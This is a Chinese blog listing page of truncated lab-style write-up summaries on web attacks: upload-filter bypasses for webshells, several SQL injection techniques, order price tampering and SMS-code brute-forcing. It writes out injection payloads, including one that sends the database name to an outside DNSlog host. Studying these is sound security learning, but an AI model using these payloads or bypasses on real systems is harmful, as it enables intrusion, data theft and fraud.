摘要: 绕过技巧:修改 MIME 类型为合法类型,一般修改为图片类型 1. 上传webshell文件,提示格式不正确; 2. 查看BP历史记录,发现有上传数据包的历史信息,判断为服务器端检查 3. 将数据包发送到Repeater,更改content-type 为image/png,并发送数据包,响应消息中提 阅读全文
posted @ 2025-02-22 20:54 小圣爱学习 阅读(0) 评论(0) 推荐(0) 编辑
摘要: 在上传点上传非法文件,提示上传文件不符合要求,且BP没有新的数据包产生,判断为客户端检查 禁用浏览器JavaScript后刷新网页,再次上传文件,提示上传成功,文件路径为uploads/test.php edge: 设置->Cookie和网站权限->所有权限->Javascript->禁用 Chor 阅读全文
posted @ 2025-02-22 19:43 小圣爱学习 阅读(0) 评论(0) 推荐(0) 编辑
摘要: DNSlog平台:http://www.dnslog.cn/ 获取数据库名: 1' and (load_file(concat('//',(select database()),'.q5lobx.dnslog.cn/abc')))%23 获取表名 1' and (load_file(concat(' 阅读全文
posted @ 2025-02-19 23:35 小圣爱学习 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 1.判断注入 1.输入 1',addslashes函数将 ' 进行转义变为 \' ,此时的单引号仅作为普通的字符 2.输入1%df',addslashes 函数将 ' 进行转义变为 \' ,此时 %df%5c会进行结合变成了一个汉字 運,因此SQL查询语句成功被改变了从而引起了报错 1%df' => 阅读全文
posted @ 2025-02-19 20:28 小圣爱学习 阅读(4) 评论(0) 推荐(0) 编辑
摘要: 1.判断是否存在注入 1.1. 输入1时,页面正常返回,输入 1'时,页面出现报错。说明很有可能存在漏洞。 1.2. 利用1 and 1=1、1 and 1=2和1'and '1'='1 、1'and '1'='2 对注入类型进行判断。 2.获取数据库名 输入 1'and updatexml(1,c 阅读全文
posted @ 2025-02-18 23:22 小圣爱学习 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 1. 判断是否存在注入 由于页面没有任何的回显,因此无法再用常规的方法进行判断,这里需要用到sleep()函数来进行判断。 sleep()函数使程序停止执行一段指定的时间。一般使用 1 and sleep(n) 1' and sleep(n)%23 进行判断,n为要停止的时间,以秒为单位。 1.当输 阅读全文
posted @ 2025-02-18 16:23 小圣爱学习 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 1. 判断是否存在注入 当输入1' and '1'='1 时,页面返回User ID exists in the database. 当输入1'and'1'='2 时,页面返回User ID is MISSING from the database. 由此判断存在布尔盲注注入点 2. 获取数据库名 阅读全文
posted @ 2025-02-17 23:32 小圣爱学习 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 1. 注入点判断 1 and 1=1 1 and 1=2 1' and '1'='1 1' and '1'='2,没有返回结果 由此可判断注入点为数据类型,单引号闭合 2. 判断表列数 3' order by 3 # 遍历order by 参数,判断查询过的列数为2列 3.确认显示位 4.获取数据库 阅读全文
posted @ 2025-02-16 17:09 小圣爱学习 阅读(0) 评论(0) 推荐(0) 编辑
摘要: 在大米CMS上购买一个商品,选择站内扣款并提交订单,BP抓包 2. 根据抓包内容找到带有敏感信息的数据包(URL 带有dobuy),分析敏感信息 根据数据包中的信息我们可以获取下面可能有用的敏感信息 商品id,数量qty,价格price, 其他信息:是否购物车结算iscart,付款方式trade_t 阅读全文
posted @ 2025-02-13 00:50 小圣爱学习 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 漏洞原理 短信验证码验证时间和次数无限制,存在爆破可能 短信验证码有效期:5~10min,验证码位数4位或6位,纯数字 破解方式:使用枚举逐个尝试 使用BP爆破短信验证码 1.可以先用已有手机号确认验证码位数 2.发送验证码后将验证码输入,然后登陆抓包 3.后续和爆破操作一致 如果字典太大,可以分开 阅读全文
posted @ 2025-02-12 00:28 小圣爱学习 阅读(2) 评论(0) 推荐(0) 编辑
点击右上角即可分享
微信分享提示